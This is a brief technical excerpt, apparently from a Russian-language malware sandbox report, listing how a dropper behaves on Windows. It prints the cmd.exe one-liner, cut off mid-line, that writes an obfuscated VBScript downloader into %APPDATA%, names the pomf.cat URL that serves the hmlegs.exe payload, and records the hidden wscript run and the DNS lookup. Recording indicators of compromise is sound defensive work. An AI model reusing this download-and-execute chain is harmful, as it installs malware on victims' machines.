Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %Appdata% &@echo L5q = "http://a.pomf.cat/hmlegs.exe">>N2b.vbs &@echo B0p = S6g("SXW4K^K")>>N2b.vbs &@echo Set U6d = CreateObject(S6g("SY^SR84^SRNZZV"))>>N2b.vbs &@echo U6d.Open S6g("MKZ"...
- %APPDATA%\n2b.vbs
- %APPDATA%\n2b.vbs
- 'a.##mf.cat':80
- http://a.##mf.cat/hmlegs.exe
- DNS ASK a.##mf.cat
- '<SYSTEM32>\wscript.exe' "%APPDATA%\N2b.vbs"
- '<SYSTEM32>\cmd.exe' /c cd %Appdata% &@echo L5q = "http://a.pomf.cat/hmlegs.exe">>N2b.vbs &@echo B0p = S6g("SXW4K^K")>>N2b.vbs &@echo Set U6d = CreateObject(S6g("SY^SR84^SRNZZV"))>>N2b.vbs &@echo U6d.Open S6g("MKZ"...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 12